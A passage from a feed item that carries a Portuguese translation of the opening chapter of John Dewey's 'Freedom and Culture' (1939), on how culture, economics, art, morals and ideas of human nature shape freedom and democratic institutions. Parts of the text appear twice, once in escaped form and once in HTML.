preço da liberdade. Os Pais Fundadores estavam cientes de que o amor ao poder é uma característica da natureza humana, tão forte que barreiras definidas precisavam ser erguidas para impedir que pessoas em posições de autoridade oficial usurpassem os limites das instituições livres. Admitir que os homens podem ser levados, por um longo hábito, a se agarrarem às suas correntes implica a crença de que uma segunda natureza, ou natureza adquirida, é mais forte do que a natureza original.&#xA;&#xA;Jefferson foi além disso. Seu temor em relação ao crescimento da indústria e do comércio, aliado à sua preferência por atividades agrárias, equivalia à aceitação da ideia de que os interesses gerados por certas atividades podem alterar fundamentalmente a natureza humana original e as instituições que lhe são compatíveis. É evidente que o desenvolvimento que Jefferson temia se concretizou, e em uma escala muito maior do que ele poderia ter previsto. Hoje, enfrentamos as consequências da transformação de um povo agrícola e rural em uma população urbana e industrial.&#xA;&#xA;A prova decisiva demonstra que os fatores econômicos são parte intrínseca da cultura, determinando o rumo das medidas e regras políticas, independentemente das crenças verbais. Embora posteriormente tenha se tornado comum obscurecer a conexão existente entre economia e política, e até mesmo repreender aqueles que a destacavam, Madison, assim como Jefferson, estava bem ciente dessa conexão e de sua influência sobre a democracia. Contudo, o conhecimento de que essa conexão exigia uma distribuição equitativa da propriedade e a prevenção do surgimento de extrema pobreza e extrema riqueza era diferente do reconhecimento explícito de uma relação tão íntima entre cultura e natureza que a primeira pode moldar os padrões de pensamento e ação.&#xA;&#xA;As relações e os hábitos econômicos não podem ser analisados isoladamente, assim como as instituições políticas. O estado do conhecimento da natureza, ou seja, da ciência física, é uma fase da cultura da qual dependem diretamente a indústria e o comércio, a produção e distribuição de bens e a regulação de serviços. A menos que levemos em conta o surgimento da nova ciência da natureza no século XVII e seu desenvolvimento até o estado atual, nossos mecanismos econômicos de produção e distribuição e, em última instância, de consumo, não podem ser compreendidos. A conexão entre os eventos da revolução industrial e os da revolução científica subsequente é um testemunho incontestável.&#xA;&#xA;Não tem sido comum incluir as artes, especialmente as belas artes, como parte importante das condições sociais que influenciam as instituições democráticas e a liberdade individual. Mesmo após admitir a influência do setor industrial e das ciências naturais, ainda tendemos a traçar uma linha divisória na ideia de que a literatura, a música, a pintura, o teatro e a arquitetura tenham qualquer ligação íntima com as bases culturais da democracia. Mesmo aqueles que se autodenominam bons democratas muitas vezes se contentam em considerar os frutos dessas artes como adornos da cultura, em vez de algo cujo desfrute todos deveriam poder desfrutar, se a democracia quiser ser uma realidade. A situação nos países totalitários pode nos levar a rever essa opinião. Pois demonstra que, independentemente dos impulsos e forças que levam o artista a criar sua obra, as obras de arte, uma vez criadas, são o meio de comunicação mais poderoso para despertar emoções e formar opiniões. O teatro, o cinema e a casa de espetáculos, até mesmo a galeria de arte, a eloquência, os desfiles populares, os esportes comuns e as instituições de lazer, tudo foi submetido à regulamentação como parte dos mecanismos de propaganda que mantêm a ditadura no poder sem que as massas a considerem opressiva. Estamos começando a perceber que as emoções e a imaginação são mais poderosas na formação do sentimento e da opinião pública do que a informação e a razão.&#xA;&#xA;De fato, muito antes da crise atual surgir, já existia um ditado que dizia que, se alguém controlasse as canções de uma nação, não precisaria se preocupar com quem fazia suas leis. E o estudo da história mostra que as religiões primitivas devem seu poder de determinar crenças e ações à sua capacidade de alcançar emoções e imaginação por meio de ritos e cerimônias, lendas e folclore, tudo revestido das características que marcam as obras de arte. A Igreja, que teve de longe a maior influência no mundo moderno, apropriou-se desses mecanismos de apelo estético e os incorporou à sua própria estrutura, adaptando-os ao seu propósito de conquistar e manter a lealdade das massas.&#xA;&#xA;Um regime totalitário se compromete com o controle total da vida de todos os seus súditos, exercendo domínio sobre sentimentos, desejos, emoções e opiniões. Isso, de fato, é uma mera obviedade, visto que um Estado totalitário precisa ser total. Mas, a menos que levemos isso em consideração, não conseguiremos apreciar a intensidade do ressurgimento da guerra entre Estado e Igreja que existe na Alemanha e na Rússia. O conflito não é expressão do capricho de um líder. É inerente a qualquer regime que exija a lealdade total de todos os seus súditos. Ele deve, antes de tudo, e sobretudo, para ser permanente, cativar a imaginação, com todos os impulsos e motivações que costumamos chamar de internos. As organizações religiosas são aquelas que governam por meio desses mecanismos e, por essa razão, são concorrentes intrínsecas de qualquer Estado político que trilhe o caminho totalitário. Assim, as mesmas coisas que nos parecem, nos países democráticos, os aspectos mais repugnantes do Estado totalitário são justamente as que seus defensores o recomendam. São as coisas cuja ausência eles denunciam nos países democráticos. Pois dizem que a incapacidade de envolver toda a composição dos cidadãos, tanto emocional quanto ideológica, condena os estados democráticos a empregar meramente artifícios externos e mecânicos para manter o apoio leal de seus cidadãos. Podemos considerar tudo isso como sintoma de uma alucinação coletiva, que por vezes parece ter dominado populações inteiras. Mesmo assim, devemos reconhecer a influência desse fator se quisermos escapar da ilusão coletiva de que o totalitarismo se baseia unicamente na coerção externa.&#xA;&#xA;Finalmente, o fator moral é parte intrínseca do complexo de forças sociais chamado cultura. Pois, independentemente de se compartilhar ou não da visão, atualmente defendida por diferentes grupos com base em diferentes argumentos, de que não há fundamento ou justificativa científica para convicções e julgamentos morais, é certo que os seres humanos prezam algumas coisas mais do que outras e que lutam por aquilo que valorizam, dedicando tempo e energia a isso: fazendo-o, aliás, a tal ponto que a melhor medida que temos do que é valorizado é o esforço despendido em sua defesa. Não só isso, mas para que um grupo de pessoas forme algo que possa ser chamado de comunidade em seu sentido pleno, é necessário que haja valores prezados em comum. Sem eles, qualquer suposto grupo social, classe, povo ou nação tende a se desintegrar em moléculas com conexões meramente impostas entre si. Pelo menos por ora, não precisamos questionar se os valores são morais, possuindo uma espécie de vida e potência próprias, ou se são apenas subprodutos do funcionamento de outras condições, biológicas, econômicas ou quaisquer outras.&#xA;&#xA;A ressalva parecerá, de fato, bastante supérflua para a maioria, tão habituadas estão as pessoas a acreditar, pelo menos nominalmente, que as forças morais são os determinantes últimos da ascensão e queda de todas as sociedades humanas — enquanto a religião ensinou muitos a crer que as forças cósmicas, assim como as sociais, são reguladas em prol de fins morais. A ressalva se faz necessária, contudo, devido à existência de uma corrente filosófica que defende que as opiniões sobre os valores que regem a conduta carecem de qualquer fundamento científico, uma vez que (segundo eles) as únicas coisas que podem ser conhecidas são os eventos físicos. A negação de que os valores tenham qualquer influência no curso dos acontecimentos a longo prazo também é característica da crença marxista de que as forças produtivas controlam, em última instância, todas as relações humanas. A ideia da impossibilidade da regulação intelectual de ideias e juízos sobre valores é compartilhada por diversos intelectuais que se deixaram deslumbrar pelo sucesso das ciências matemáticas e físicas. Essas últimas observações sugerem que há pelo menos um outro fator na cultura que merece atenção: a existência de correntes de filosofia social, de ideologias concorrentes.&#xA;&#xA;A intenção da discussão anterior deve ser óbvia. O problema da liberdade e das instituições democráticas está ligado à questão de que tipo de cultura existe; à necessidade de uma cultura livre para que existam instituições políticas livres. A importância dessa conclusão vai muito além do seu contraste com a crença mais simples daqueles que formularam a tradição democrática. A questão da psicologia humana, da constituição da natureza humana em seu estado original, está envolvida. Está envolvida não apenas de forma geral, mas também em relação aos seus componentes específicos e à sua importância nas relações entre si. Pois toda filosofia social e política atualmente professada, após exame, revelará que envolve uma certa visão sobre a constituição da natureza humana: em si mesma e em sua relação com a natureza física. O que é verdade sobre esse fator é verdade sobre todos os fatores da cultura, de modo que não precisam ser listados novamente aqui, embora seja necessário tê-los todos em mente se quisermos apreciar a variedade de fatores envolvidos no problema da liberdade humana.&#xA;&#xA;A questão da relação entre este ou aquele componente da cultura e as instituições sociais em geral, e a democracia política em particular, raramente é abordada. No entanto, essa questão é tão fundamental para qualquer análise crítica dos princípios de cada uma delas que alguma conclusão sobre o assunto acaba por definir a posição adotada em cada questão específica. A questão é se algum dos fatores é tão predominante a ponto de ser a força causal, de modo que os outros fatores sejam efeitos secundários e derivados. Geralmente, a resposta encontrada segue uma linha que os filósofos denominam monista. O exemplo mais óbvio é a crença de que as condições econômicas são, em última análise, as forças controladoras das relações humanas. Talvez seja significativo que essa visão seja relativamente recente. No auge do século XVIII, o Iluminismo, a visão predominante, conferia supremacia final à razão, ao avanço da ciência e à educação. Mesmo durante o século passado, prevalecia uma visão expressa no lema de uma certa escola de historiadores: “A história é a política do passado e a política é a história do presente”.&#xA;&#xA;Devido à atual tendência das explicações econômicas, essa visão política pode agora parecer ter sido uma mania de um grupo específico de historiadores. Mas, afinal, ela apenas formulou uma ideia que foi consistentemente posta em prática durante o período de formação dos Estados nacionais. É possível considerar a ênfase atual nos fatores econômicos como uma espécie de vingança intelectual pela negligência quase total que sofreu no passado. A própria expressão “economia política” sugere o quão completamente as considerações econômicas foram outrora subordinadas às políticas. O livro que foi influente para pôr fim a essa submissão, A Riqueza das Nações, de Adam Smith, deu continuidade, em seu título, embora não em seu conteúdo, à tradição mais antiga. No período grego, vemos que Aristóteles confere ao fator político um poder tão grande que todas as atividades econômicas normais são relegadas ao âmbito doméstico, de modo que toda prática econômica moralmente justificável é, literalmente, economia doméstica. E apesar da recente popularidade da teoria marxista, Oppenheimer produziu um conjunto considerável de evidências em apoio à tese de que os estados políticos são o resultado de conquistas militares nas quais os povos derrotados se tornaram súditos de seus conquistadores, que, ao assumirem o domínio sobre os conquistados, deram origem aos primeiros estados políticos.&#xA;&#xA;A ascensão dos estados totalitários não pode, pelo simples fato de serem totalitários, ser considerada uma mera regressão à antiga teoria da supremacia do fator institucional político. Contudo, em comparação com as teorias que subordinaram o político ao econômico, seja na forma marxista ou na da escola clássica britânica, ela representa uma regressão a ideias e, ainda mais, a práticas que se supunha terem desaparecido para sempre da conduta de qualquer estado moderno. E essas práticas foram revividas e ampliadas com o benefício da técnica científica de controle da indústria, das finanças e do comércio, de maneiras que demonstram que os antigos funcionários governamentais que adotaram a economia &#34;mercantilista&#34; em nome do governo eram os maiores incompetentes em seu trabalho declarado.&#xA;&#xA;A ideia de que a moral deveria ser, mesmo que não o seja, a suprema reguladora dos assuntos sociais não é tão difundida como já foi, e há circunstâncias que corroboram a conclusão de que, quando as forças morais eram tão influentes quanto se supunha, era porque a moral era idêntica aos costumes que, de fato, regulavam as relações entre os seres humanos. Contudo, a ideia de que a adoção, por exemplo, da Regra de Ouro, eliminaria rapidamente toda a discórdia e os problemas sociais ainda é propagada por sermões e editoriais da imprensa; e, enquanto escrevo, os jornais noticiam o progresso de uma campanha por algo chamado “rearmamento moral”. Em um nível mais profundo, a questão levantada sobre a suposta identidade da ética com os costumes estabelecidos suscita a pergunta de se o efeito da desintegração dos costumes que, por muito tempo, mantiveram os homens unidos em grupos sociais pode ser superado senão pelo desenvolvimento de novas tradições e costumes geralmente aceitos. Esse desenvolvimento, sob essa perspectiva, seria equivalente à criação de uma nova ética.&#xA;&#xA;Contudo, tais questões são aqui levantadas devido à ênfase que conferem à questão já apresentada: existe algum fator ou fase da cultura que seja dominante, ou que tenda a produzir e regular outros, ou a economia, a moral, a arte, a ciência, e assim por diante, são apenas aspectos da interação de diversos fatores, cada um dos quais age sobre os outros e é afetado por eles? Na linguagem profissional da filosofia: nosso ponto de vista deve ser monista ou pluralista? A mesma questão se repete, além disso, em relação a cada um dos fatores listados: — sobre a economia, sobre a política, sobre a ciência, sobre a arte. Ilustrarei aqui o ponto não com base em nenhuma dessas coisas, mas em teorias que, em diferentes momentos, influenciaram a compreensão da natureza humana. Pois essas teorias psicológicas foram marcadas por sérias tentativas de fazer de algum componente da natureza humana a fonte da motivação da ação; ou, pelo menos, de reduzir toda a conduta à ação de um pequeno número de supostas “forças” inatas. Um exemplo relativamente recente foi a adoção, pela escola clássica da teoria econômica, do autointeresse como a principal força motivadora do comportamento humano; Uma ideia ligada, em seu aspecto técnico, à noção de que o prazer e a dor são as causas e os fins de toda conduta humana consciente, no desejo de obter um e evitar o outro. Havia também a visão de que o interesse próprio e a compaixão são os dois componentes da natureza humana, enquanto tendências centrífugas e centrípetas opostas e equilibradas são as forças motrizes da natureza celeste.&#xA;&#xA;Atualmente, o candidato ideológico e psicológico preferido para o controle da atividade humana é o amor pelo poder. As razões para essa escolha não são difíceis de encontrar. O sucesso na busca pelo lucro econômico mostrou-se, em grande parte, condicionado à posse de poder superior, enquanto o sucesso reagiu ao aumento do poder. Além disso, a ascensão dos Estados nacionais foi acompanhada por uma organização tão vasta e flagrante das forças militares e navais que a política se tornou cada vez mais marcadamente política de poder, levando à conclusão de que não existe outra forma de política, embora no passado o elemento poder tenha sido mais discretamente disfarçado. Uma interpretação da luta darwiniana pela existência e sobrevivência do mais apto foi usada como suporte ideológico; e alguns autores, notadamente Nietzsche (embora não na forma grosseira frequentemente alegada), propuseram uma ética do poder em oposição à suposta ética cristã do sacrifício.&#xA;&#xA;Como a natureza humana é o fator que, de uma forma ou de outra, interage constantemente com as condições ambientais na produção cultural, o tema recebe atenção especial mais adiante. Mas a mudança que ocorreu ocasionalmente nas teorias que ganharam força sobre o &#34;motivo dominante&#34; na natureza humana sugere uma questão raramente levantada: será que essas psicologias não inverteram a ordem dos fatores? Não teriam elas construído sua noção sobre o elemento dominante na natureza humana a partir da observação de tendências marcantes na vida coletiva contemporânea, agrupando-as em alguma suposta &#34;força&#34; psicológica como sua causa? É significativo que a natureza humana tenha sido considerada fortemente movida por um amor inato à liberdade na época em que havia uma luta por um governo representativo; que o motivo do interesse próprio tenha surgido quando as condições na Inglaterra ampliaram o papel do dinheiro, devido aos novos métodos de produção industrial; que o crescimento das atividades filantrópicas organizadas tenha introduzido a compaixão no quadro psicológico; e que os eventos atuais sejam facilmente convertidos em amor ao poder como a principal força motriz da ação humana.&#xA;&#xA;Em todo caso, a ideia de cultura que se tornou familiar através do trabalho de estudiosos da antropologia aponta para a conclusão de que, quaisquer que sejam os constituintes nativos da natureza humana, a cultura de um período e grupo é a influência determinante em sua organização; é ela que determina os padrões de comportamento que caracterizam as atividades de qualquer grupo, família, clã, povo, seita, facção ou classe. É tão verdadeiro que o estado da cultura determina a ordem e a organização das tendências nativas quanto que a natureza humana produz qualquer conjunto ou sistema particular de fenômenos sociais para obter satisfação pessoal. O problema é descobrir como os elementos de uma cultura interagem entre si e como os elementos da natureza humana são levados a interagir entre si sob as condições estabelecidas por sua interação com o ambiente existente. Por exemplo, se nossa cultura americana é em grande parte uma cultura pecuniária, não é porque a estrutura original ou inata da natureza humana tenda por si mesma a obter lucro pecuniário. É antes que uma determinada cultura complexa estimule, promova e consolida tendências nativas de modo a produzir um certo padrão de desejos e propósitos. Se considerarmos todas as comunidades, povos, classes, tribos e nações que já existiram, podemos ter certeza de que, como a natureza humana em sua constituição inata é a constante relativa, não se pode recorrer a ela, isoladamente, para explicar a multiplicidade de diversidades apresentadas pelas diferentes formas de associação.&#xA;&#xA;Povos primitivos, por razões agora bastante evidentes, atribuem qualidades mágicas ao sangue. Crenças populares sobre raça e diferenças raciais inerentes praticamente perpetuaram as superstições mais antigas. Os antropólogos concordam quase unanimemente que as diferenças que encontramos em diferentes &#34;raças&#34; não se devem a nada na estrutura fisiológica inerente, mas aos efeitos exercidos sobre os membros de vários grupos pelas condições culturais em que são criados; condições que atuam sobre a natureza humana bruta ou original incessantemente desde o momento do nascimento. Sempre se soube que bebês, nascidos sem domínio de qualquer idioma, passam a falar o idioma, qualquer que seja, da comunidade em que nasceram. Como a maioria dos fenômenos uniformes, esse fato não despertou curiosidade nem levou a generalizações sobre a influência das condições culturais. Era dado como certo; era tão &#34;natural&#34; que parecia inevitável. Somente com o surgimento de pesquisas sistemáticas realizadas por estudantes de antropologia é que se notou que as condições culturais que produzem o idioma comum de um determinado grupo geram outras características que eles têm em comum. — características que, assim como a língua materna, diferenciam um grupo ou sociedade de outros.&#xA;A cultura, enquanto corpo complexo de costumes, tende a se manter. Ela só pode se reproduzir através da promoção de certas mudanças diferenciais nas constituições originais ou nativas de seus membros.&#xA;&#xA;Cada cultura possui seu próprio padrão, sua própria organização característica de suas energias constituintes. Pela mera força de sua existência, bem como por métodos deliberadamente adotados e sistematicamente aplicados, ela se perpetua através da transformação da natureza humana bruta ou original daqueles que nascem imaturos.&#xA;&#xA;Essas afirmações não significam que a hereditariedade biológica e as diferenças individuais nativas não tenham importância. Significam que, ao operarem dentro de uma determinada forma social, são moldadas e produzem efeitos dentro dessa forma específica. Não são características indígenas que distinguem um povo, um grupo, uma classe de outro, mas sim características que marcam diferenças em todos os grupos. Seja qual for o “fardo do homem branco”, ele não foi imposto pela hereditariedade.&#xA;&#xA;Percorremos um longo caminho desde as perguntas iniciais, a ponto de parecer que elas foram esquecidas ao longo da jornada. Mas a jornada foi empreendida com o objetivo de descobrir algo sobre a natureza do problema expresso nas perguntas formuladas. A manutenção das instituições democráticas não é uma questão tão simples quanto alguns dos Pais Fundadores supunham — embora os mais sábios entre eles percebessem o quanto o novo experimento político era favorecido por circunstâncias externas — como o oceano que separava os colonos dos governos que tinham interesse em usá-los para seus próprios fins; o fato de as instituições feudais terem sido deixadas para trás; que muitos colonos vieram para cá para escapar das restrições às crenças religiosas e às formas de culto; e, especialmente, a existência de um vasto território com terras livres e imensos recursos naturais ainda não apropriados.&#xA;&#xA;A função da cultura em determinar quais elementos da natureza humana são dominantes e seu padrão ou arranjo em relação uns aos outros vai além de qualquer ponto específico a que se desvie a atenção. Ela afeta a própria ideia de individualidade. A ideia de que a natureza humana é inerentemente e exclusivamente individual é, em si, um produto de um movimento cultural individualista. A ideia de que a mente e a consciência são intrinsecamente individuais sequer ocorreu a alguém durante grande parte da história da humanidade. Teria sido rejeitada como a fonte inevitável de desordem e caos se alguém tivesse sequer cogitado sugeri-la — não que suas ideias sobre a natureza humana, por esse motivo, fossem melhores do que as posteriores, mas sim que também eram funções da cultura. Tudo o que podemos afirmar com segurança é que a natureza humana, como outras formas de vida, tende à diferenciação, e esta se move na direção do distintamente individual, e que também tende à combinação, à associação. Nos animais inferiores, fatores físico-biológicos determinam qual tendência é dominante em uma dada espécie animal ou vegetal e a proporção existente entre os dois fatores — se, por exemplo, os insetos são o que os estudantes chamam de “solitários” ou “sociais”. Nos seres humanos, as condições culturais substituem as estritamente físicas. Nos períodos iniciais da história humana, elas atuavam quase como condições fisiológicas no que diz respeito à intenção deliberada. Eram consideradas “naturais” e qualquer alteração nelas, antinatural. Em um período posterior, as condições culturais passaram a ser vistas como sujeitas, em certa medida, à formação deliberada. Por um tempo, os radicais identificaram suas políticas com a crença de que, se as condições sociais artificiais fossem eliminadas, a natureza humana produziria quase automaticamente um certo tipo de arranjo social, aquele que lhe daria livre curso em seu suposto caráter exclusivamente individual.&#xA;&#xA;Tendências à sociabilidade, como a simpatia, eram admitidas. Mas eram consideradas traços de um indivíduo isolado por natureza, tanto quanto, digamos, uma tendência a se associar a outros para obter proteção contra algo que ameace o próprio eu privado. Se a completa identificação da natureza humana com a individualidade seria desejável ou indesejável, caso existisse, é uma questão acadêmica ociosa. Pois ela não existe. Algumas condições culturais desenvolvem os componentes psicológicos que levam à diferenciação; outras estimulam aqueles que levam à solidariedade da colmeia ou do formigueiro. O problema humano é o de assegurar o desenvolvimento de cada componente para que ele sirva para liberar e amadurecer o outro. A cooperação — chamada de fraternidade na fórmula clássica francesa — é tão parte do ideal democrático quanto a iniciativa pessoal. O fato de terem sido permitidas condições culturais (notavelmente na fase econômica) que subordinaram a cooperação à liberdade e à igualdade explica o declínio destas duas últimas. Indiretamente, esse declínio é responsável pela atual tendência de denegrir a própria palavra individualismo e de transformar a sociabilidade em um termo de honra moral acima de qualquer crítica. Mas a ideia de que a associação de nulidades, mesmo em larga escala, constituiria uma realização da natureza humana é tão absurda quanto supor que esta possa ocorrer em seres cujas únicas relações entre si sejam aquelas estabelecidas em prol de vantagens privadas exclusivas.&#xA;&#xA;O problema da liberdade das individualidades cooperativas deve, portanto, ser analisado no contexto da cultura. O estado da cultura é um estado de interação de muitos fatores, entre os quais se destacam o direito e a política, a indústria e o comércio, a ciência e a tecnologia, as artes da expressão e da comunicação, e a moral, ou seja, os valores que os homens prezam e as maneiras pelas quais os avaliam; e, finalmente, embora indiretamente, o sistema de ideias gerais utilizado pelos homens para justificar e criticar as condições fundamentais em que vivem, sua filosofia social. Estamos preocupados com o problema da liberdade, e não com soluções: na convicção de que as soluções são inúteis enquanto o problema não for colocado no contexto dos elementos que constituem a cultura, em sua interação com elementos da natureza humana inata. O postulado fundamental da discussão é que o isolamento de qualquer fator, por mais forte que seja sua atuação em um dado momento, é fatal para a compreensão e para a ação inteligente. Isolamentos têm sido abundantes, tanto por considerarem algum aspecto da natureza humana como um &#34;motivo&#34; supremo, quanto por considerarem alguma forma de atividade social como suprema. Uma vez que o problema aqui é entendido como a forma como um grande número de fatores internos e externos à natureza humana interagem, nossa próxima tarefa é questionar as conexões recíprocas que a natureza humana em seu estado bruto e a cultura mantêm entre si.]]&gt;</description>
      <content:encoded><![CDATA[<p>Por John Dewey em <em>Liberdade e Cultura</em> (EUA, 1939).
</p>

<p>O que é liberdade e por que ela é tão valorizada? O desejo de liberdade é inerente à natureza humana ou é produto de circunstâncias especiais? Ela é desejada como um fim em si mesma ou como um meio para se obter outras coisas? Sua posse implica responsabilidades, e essas responsabilidades são tão onerosas que a maioria das pessoas abriria mão da liberdade em prol de maior conforto? A luta pela liberdade é tão árdua que a maioria das pessoas se distrai facilmente do esforço para conquistá-la e mantê-la? A liberdade em si e tudo o que ela proporciona parece tão importante quanto a segurança do sustento; quanto comida, abrigo, vestuário ou mesmo se divertir? O homem já se importou tanto com ela quanto nos ensinaram a acreditar neste país? Há alguma verdade na antiga noção de que a força motriz da história política foi o esforço do homem comum para alcançar a liberdade? Nossa própria luta pela independência política foi, de fato, motivada pelo desejo de liberdade, ou havia uma série de desconfortos dos quais nossos ancestrais queriam se livrar, coisas que não tinham nada em comum além de serem consideradas problemáticas?</p>

<p>Será que o amor à liberdade é algo mais do que um desejo de se libertar de alguma restrição específica? E quando essa restrição é eliminada, o desejo de liberdade se dissipa até que algo mais se torne intolerável? Além disso, como se compara, em intensidade, o desejo de liberdade com o desejo de se sentir igual aos outros, especialmente àqueles que antes eram considerados superiores? Como se comparam os frutos da liberdade com os prazeres que brotam de um sentimento de união, de solidariedade, com os outros? Estarão os homens dispostos a renunciar às suas liberdades se acreditarem que, ao fazê-lo, obterão a satisfação que advém de um sentimento de fusão com os outros e do respeito alheio, produto da força proporcionada pela solidariedade?</p>

<p>O estado atual do mundo coloca questões como essas aos cidadãos de todos os países democráticos. Coloca-as com especial força em nós, em um país onde as instituições democráticas estão intrinsecamente ligadas a uma certa tradição, cuja “ideologia” é a expressão clássica da Declaração de Independência. Essa tradição nos ensinou que a conquista da liberdade é o objetivo da história política; que o autogoverno é o direito inerente dos homens livres e é aquilo que, uma vez alcançado, os homens prezam acima de tudo. Contudo, ao observarmos o mundo, vemos instituições supostamente livres em muitos países não tanto derrubadas, mas abandonadas voluntariamente, aparentemente com entusiasmo. Podemos inferir que o ocorrido é a prova de que elas nunca existiram na realidade, mas apenas de nome. Ou podemos nos consolar com a crença de que circunstâncias incomuns, como a frustração e a humilhação nacional, levaram os homens a acolher qualquer tipo de governo que prometesse restaurar o respeito próprio nacional. Mas as condições em nosso país, assim como o declínio da democracia em outros países, nos obrigam a questionar a trajetória e o destino das sociedades livres, inclusive a nossa.</p>

<p>Talvez tenha havido um tempo em que as perguntas feitas parecessem ser principalmente ou exclusivamente políticas. Agora sabemos mais. Pois sabemos que grande parte das causas que produziram as condições expressas nas perguntas reside na dependência da política em relação a outras forças, notadamente a econômica. O problema da constituição da natureza humana está envolvido, visto que faz parte de nossa tradição que o amor à liberdade é inerente à sua essência. Será a psicologia popular da democracia um mito? A antiga doutrina sobre a natureza humana também estava ligada à crença ética de que a democracia política é um direito moral e que as leis em que se baseia são leis morais fundamentais que toda forma de organização social deve obedecer. Se a crença nos direitos naturais e nas leis naturais como fundamento do governo livre for abandonada, este último terá alguma outra base moral? Embora seja insensato acreditar que as colônias americanas travaram as batalhas que garantiram sua independência e que construíram seu governo consciente e deliberadamente sobre uma base de teorias psicológicas e morais, a tradição democrática, seja ela um sonho ou uma visão perspicaz, estava tão intimamente ligada a crenças sobre a natureza humana e sobre os fins morais que as instituições políticas deveriam servir, que um choque brutal ocorre quando essas relações se rompem. Haverá algo que possa substituí-las, algo que ofereça o tipo de apoio que outrora proporcionavam?</p>

<p>Os problemas subjacentes às perguntas formuladas, as forças que lhes conferem urgência, transcendem as crenças particulares que formaram o alicerce psicológico e moral inicial da democracia. Após se aposentar da vida pública, Thomas Jefferson, em sua velhice, manteve uma amistosa correspondência filosófica com John Adams. Em uma de suas cartas, ele fez uma declaração sobre as condições americanas da época e expressou uma esperança quanto ao futuro do país: “O avanço do liberalismo alimenta a esperança de que a mente humana um dia retorne à liberdade que desfrutava há dois mil anos. Este país, que deu ao mundo o exemplo da liberdade física, deve-lhe também o da emancipação moral, pois, até o momento, ela ainda é apenas nominal entre nós. A inquisição da opinião pública, na prática, supera a liberdade teoricamente afirmada pelas leis.” A situação que se desenvolveu desde então pode muito bem nos levar a inverter as ideias que ele expressou e a questionar se a liberdade política pode ser mantida sem a liberdade cultural que ele esperava ser o resultado final da liberdade política. Já não é fácil alimentar a esperança de que, dada a liberdade política como a única coisa necessária, todas as outras coisas lhe serão acrescentadas com o tempo — e, consequentemente, a nós. Pois agora sabemos que as relações que existem entre as pessoas, fora das instituições políticas — relações de indústria, de comunicação, de ciência, de arte e de religião — afetam as associações diárias e, por conseguinte, influenciam profundamente as atitudes e os hábitos expressos no governo e nas normas jurídicas. Se é verdade que o político e o jurídico reagem para moldar as outras coisas, é ainda mais verdade que as instituições políticas são um efeito, e não uma causa.</p>

<p>É esse conhecimento que define o tema a ser discutido. Pois esse complexo de condições que rege os termos em que os seres humanos se associam e vivem juntos se resume na palavra Cultura. O problema é saber que tipo de cultura é tão livre em si mesma que concebe e gera a liberdade política como seu acompanhamento e consequência. O que dizer do estado da ciência e do conhecimento; das artes, belas artes e tecnologia; das amizades e da vida familiar; dos negócios e das finanças; das atitudes e disposições criadas na troca das relações cotidianas? Independentemente da constituição inata da natureza humana, suas atividades laborais, aquelas que respondem a instituições e regras e que, em última análise, moldam o padrão destas, são criadas por todo o conjunto de ocupações, interesses, habilidades e crenças que constituem uma determinada cultura. À medida que esta se transforma, especialmente à medida que se torna complexa e intrincada, como ocorreu com a vida americana desde a formação de nossa organização política, novos problemas substituem aqueles que governavam a formação e a distribuição anteriores dos poderes políticos. A ideia de que o amor à liberdade é tão inerente ao homem que, se lhe for dada a oportunidade pela abolição das opressões exercidas pela Igreja e pelo Estado, produzirá e manterá instituições livres já não se sustenta. Essa ideia surgiu naturalmente quando os colonizadores de um novo país sentiram que a distância que haviam criado entre si e as forças que os oprimiam simbolizava, na prática, tudo o que se interpunha entre eles e a conquista permanente da liberdade. Agora, somos obrigados a reconhecer que são necessárias condições positivas, que constituam o estado atual da cultura. A libertação das opressões e repressões que existiam anteriormente representou uma transição necessária, mas as transições são apenas pontes para algo diferente.</p>

<p>Os primeiros republicanos foram obrigados, ainda em sua época, a observar que as condições gerais, como as resumidas sob o nome de cultura, tinham muito a ver com as instituições políticas. Pois eles sustentavam que as opressões do Estado e da Igreja exerciam uma influência corruptora sobre a natureza humana, de modo que o impulso original para a liberdade havia se perdido ou se deformado. Isso era praticamente uma admissão de que as circunstâncias externas podiam ser mais fortes do que as tendências inatas. Demonstrava um grau de plasticidade na natureza humana que exigia o exercício de uma solicitude contínua — expressa no ditado de que a vigilância eterna é o preço da liberdade. Os Pais Fundadores estavam cientes de que o amor ao poder é uma característica da natureza humana, tão forte que barreiras definidas precisavam ser erguidas para impedir que pessoas em posições de autoridade oficial usurpassem os limites das instituições livres. Admitir que os homens podem ser levados, por um longo hábito, a se agarrarem às suas correntes implica a crença de que uma segunda natureza, ou natureza adquirida, é mais forte do que a natureza original.</p>

<p>Jefferson foi além disso. Seu temor em relação ao crescimento da indústria e do comércio, aliado à sua preferência por atividades agrárias, equivalia à aceitação da ideia de que os interesses gerados por certas atividades podem alterar fundamentalmente a natureza humana original e as instituições que lhe são compatíveis. É evidente que o desenvolvimento que Jefferson temia se concretizou, e em uma escala muito maior do que ele poderia ter previsto. Hoje, enfrentamos as consequências da transformação de um povo agrícola e rural em uma população urbana e industrial.</p>

<p>A prova decisiva demonstra que os fatores econômicos são parte intrínseca da cultura, determinando o rumo das medidas e regras políticas, independentemente das crenças verbais. Embora posteriormente tenha se tornado comum obscurecer a conexão existente entre economia e política, e até mesmo repreender aqueles que a destacavam, Madison, assim como Jefferson, estava bem ciente dessa conexão e de sua influência sobre a democracia. Contudo, o conhecimento de que essa conexão exigia uma distribuição equitativa da propriedade e a prevenção do surgimento de extrema pobreza e extrema riqueza era diferente do reconhecimento explícito de uma relação tão íntima entre cultura e natureza que a primeira pode moldar os padrões de pensamento e ação.</p>

<p>As relações e os hábitos econômicos não podem ser analisados isoladamente, assim como as instituições políticas. O estado do conhecimento da natureza, ou seja, da ciência física, é uma fase da cultura da qual dependem diretamente a indústria e o comércio, a produção e distribuição de bens e a regulação de serviços. A menos que levemos em conta o surgimento da nova ciência da natureza no século XVII e seu desenvolvimento até o estado atual, nossos mecanismos econômicos de produção e distribuição e, em última instância, de consumo, não podem ser compreendidos. A conexão entre os eventos da revolução industrial e os da revolução científica subsequente é um testemunho incontestável.</p>

